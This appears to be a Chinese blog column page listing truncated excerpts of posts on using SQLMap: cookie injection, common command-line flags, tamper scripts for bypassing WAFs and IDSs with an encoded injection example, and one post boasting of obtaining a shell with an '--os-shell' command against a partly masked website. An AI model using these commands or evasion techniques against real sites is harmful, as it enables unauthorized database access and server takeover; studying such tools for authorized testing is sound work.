kuxing100的专栏

SQLMap被称为注入神器，N多大神都使用SQLmap来进行注入测试，我等小菜当然也会用来装一下A*C，用了N久SQLMAP了，但是极少用到cookie注入，一遇到cookie注入就去使用注入中转工具，比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入，就研究了一下，发现其实sqlmap进行cookie注入很简单的。测试URL： 参数获取使用的是

-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断，下次恢复在注入(保存：-s “xx.log”　　恢复:-s “xx.log” –resume)–colum

WAF（web应用防火墙）逐渐成为安全解决方案的标配之一。正因为有了它，许多公司甚至已经不在意web应用的漏洞。遗憾的是，并不是所有的waf都是不可绕过的！本文将向大家讲述，如何使用注入神器SQLMap绕过WAFs/IDSs。svn下载最新版本的sqlmapsvn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-de

首先这个文章我是转来的 http://www.chuhades.com/post/19590b_4cc51f 确实很实用，就当记录一下吧，方便日后查询。 apostrophemask.py UTF-8编码 Example: * Input: AND '1'='1' * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

借鉴 http://www.2cto.com/Article/201206/138091.html 俺稍微改了一下 - = 凑合着用 反正我特么的拿到shell了. 记录开始. sqlmap.py -u "http://www.****.cn/job/index.php?key=1" --os-shell [14:39:11] [IN